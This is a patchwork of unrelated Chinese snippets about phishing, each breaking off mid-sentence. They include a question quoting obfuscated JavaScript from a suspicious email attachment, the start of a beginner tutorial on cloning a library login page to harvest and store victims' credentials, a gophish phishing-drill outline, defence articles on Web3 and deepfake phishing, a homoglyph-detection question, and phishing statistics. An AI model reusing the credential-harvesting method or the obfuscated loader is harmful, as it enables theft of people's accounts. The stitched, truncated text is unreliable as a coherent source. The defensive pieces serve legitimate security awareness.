我的一些非IT同事在一封看起来非常可疑的电子邮件中打开了一个.html附件。当出现某些javascript代码运行时，它会导致空白屏幕。functionuK(){};varkV='';uK.prototype={f:function(){d=4906;varw=function(){};varu=newDate();varhK=function(){};varh='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g,'');varn=newArray()

**声明：小白一枚，写下来为了记录和学习交流，大神不喜勿喷。**大体思路：仿页面，社工诱导用户填写信息，提交传入后端，后端获取信息并存储，传回“服务器繁忙”或虚假信息并重定向到真实网站。目录一、前端界面制作(一)表单提交的两种姿势1、按钮实现2、标签实现​二、后端文件制作文本存储的实现(直接上代码，代码我也会放在末尾邮箱存储数据库存储三、模拟受害者进行访站并对数据进行观察查看文本数据查看邮箱数据​编辑查看数据库数据一、前端界面制作1、利用仿站工具或手动将网站模拟出来。(在这里我用的是xft小工具，有需要的可以下载，我放在文末) 2、在这我们模仿某图书馆的登录页面 3、打开仿站工具，输入我们要仿

文章目录一、简介1.1前言1.2整体思路1.3演练所需1.4各邮件厂商日群发上限二、钓鱼平台搭建及配置2.1gophish平台搭建2.2收件目标配置（User&Groups）2.3发信邮箱配置（SendingProfiles）2.4邮件模版配置（EmailTemplates）2.5钓鱼网站配置（LandingPages）2.6发件活动配置（Campaigns）2.7跳转警示网站三、数据统计3.1统计方法：3.1.1后台文件导出3.1.2文件整理方法3.1.3人工删选技巧3.2注意事项四、演练意义声明：禁止一切非法网络钓鱼行动，本文章旨在安全分享，仅供安全学习探讨，如非法未授权进行网络钓鱼，由此

前言北京时间2022年6月5日，知道创宇区块链安全实验室监测到著名NFT项目（无聊猿）的Discord社群再次遭受了网络钓鱼攻击，造成约200枚以太币的损失。在此之前，著名歌手周杰伦在愚人节当天就曾遭受网络钓鱼攻击，导致其库存中的无聊猿NFT被黑客转移。近年来，我们发现在web3世界中网络钓鱼事件频发，导致项目方以及广大用户损失惨重，那么今天我们就来聊聊什么是网络钓鱼，以及该如何去防范。什么是网络钓鱼网络钓鱼（Phishing）是指黑客通过各种社交手段获取受害人的信任使其访问黑客伪造的与官方网站十分相似的钓鱼网站，欺骗或操控当钓鱼攻击成功后将受害人造成不可挽回的损失，轻则个人信息泄露、账号被盗

新应用需要使用OAuth2.0我使用此博客中的代码进行身份验证:http://kartiklad.com/$redirect_url='http://url-of-site-for-canvas-app.com/authorize/';$oauth_url='https://graph.facebook.com/oauth/authorize?client_id='.$client_id.'&redirect_uri='.$redirect_url.'&type=user_agent&&display='.$display.'&scope='.$scope;我创建了一个名为author

当疫情来袭时，网络罪犯看到了他们的机会。随着公司办公、政府机构、学校和大学从以往的工作模式转向远程线上办公模式，甚至许多医疗保健设施都转向线上，这种快速的过渡性质导致了不可避免的网络安全漏洞。消费者宽带和个人设备破坏了企业安全堆栈：不安全的用户实践和被忽视的安全修补程序在整个环境中打开了充足的漏洞。与此同时，经常冲浪的公众很容易成为网络钓鱼攻击的猎物。其影响是可以预见的：网络钓鱼攻击、DDoS攻击和勒索软件攻击都激增。2020年，80%的公司发现网络攻击事件有所增加，而疫情则是被指责为银行网络攻击增加238%的原因。自2020年2月底以来，网络钓鱼已跃升600%。为什么勒索软件攻击和成本飙升疫

译者|涂承烨审校|重楼在当今的数字时代，深度造假技术和语音网络钓鱼策略的激增，给数字通信的真实性和安全性带来了重大挑战。深度造假者操纵音频和视频，创造出令人信服的假冒内容，而深度造假者则利用语音模拟来欺骗个人，以泄露敏感信息。准确识别和减轻这些威胁对于保护个人和组织免受错误信息、欺诈和身份盗窃的潜在后果至关重要。1.理解深度造假和钓鱼深度造假是使用深度学习技术创建的，特别是生成式对抗网络（GANs），以生成或修改视频和音频录音，使它们看起来真实。这项技术可以高精度地交换人脸、模仿声音和改变表情。另一方面，钓鱼公司使用语音工程来模拟可信的实体，欺骗受害者泄露机密数据。随着文本到语音技术的进步，创

主要问题我正在使用Java开发一个API，它需要检测网络钓鱼电子邮件中品牌(例如PayPal、Mastercard等)的使用情况。显然，攻击者使用不同的策略来瞄准这些品牌，从而使它们更难被发现。例如，“rnastercard”看起来与“mastercard”非常相似，可以欺骗毫无戒心的用户。此时我可以使用模糊字符串搜索的形式轻松检测出这些品牌的拼写错误。然而，我面临的问题是，当攻击者使用同形文字更改特定品牌的名称但保持相同的视觉解释时。同形文字攻击将[a-zA-Z]模式中的字符替换为看起来相似但超出此范围的字符。例如，使用特定字符集的攻击者可以使用看起来像P的希腊字母RHO来攻击Pay

企业报告手机诈骗造成重大损失61%的企业仍因手机诈骗蒙受重大损失，其中短信和语音诈骗最普遍，损失也最大。企业在通信服务提供商(CSP)用户中占有相当大的份额，在其收入中所占份额更大，他们依靠CSP来保护自己免受电信相关欺诈的影响，85%的人表示安全对他们的电信购买决策很重要或非常重要。自2022年11月推出ChatGPT以来，恶意攻击、钓鱼攻击和网络钓鱼攻击增加了惊人的1265%。61%的企业受访者表示，他们的移动消息欺诈成本很高，但超过75%的受访者没有投资于短信垃圾邮件或语音诈骗/欺诈防护。51%的人表示，他们希望电信运营商保护他们免受语音和移动消息欺诈的影响，称他们的角色比云提供商、托管

网络安全公司Enea近日发布的一份报告指出，随着以人工智能驱动的的语音钓鱼(vishing)和短信钓鱼(smishing)攻击激增，自2022年11月OpenAI发布ChatGPT以来，网络钓鱼(phishing)攻击整体增加了惊人的1265%。移动欺诈损失惨重安全性成企业采购电信服务关键依据报告显示，61%的企业因移动欺诈遭受了重大损失，其中短信钓鱼和语音钓鱼是最普遍且造成损失最多的攻击手段。51%的企业期望电信运营商保护他们免受语音和移动消息欺诈，他们认为电信运营商在欺诈防护中扮演的角色比云提供商、托管IT提供商、系统集成商或软件供应商更重要，85%的企业表示安全性是他们在电信服务采购决策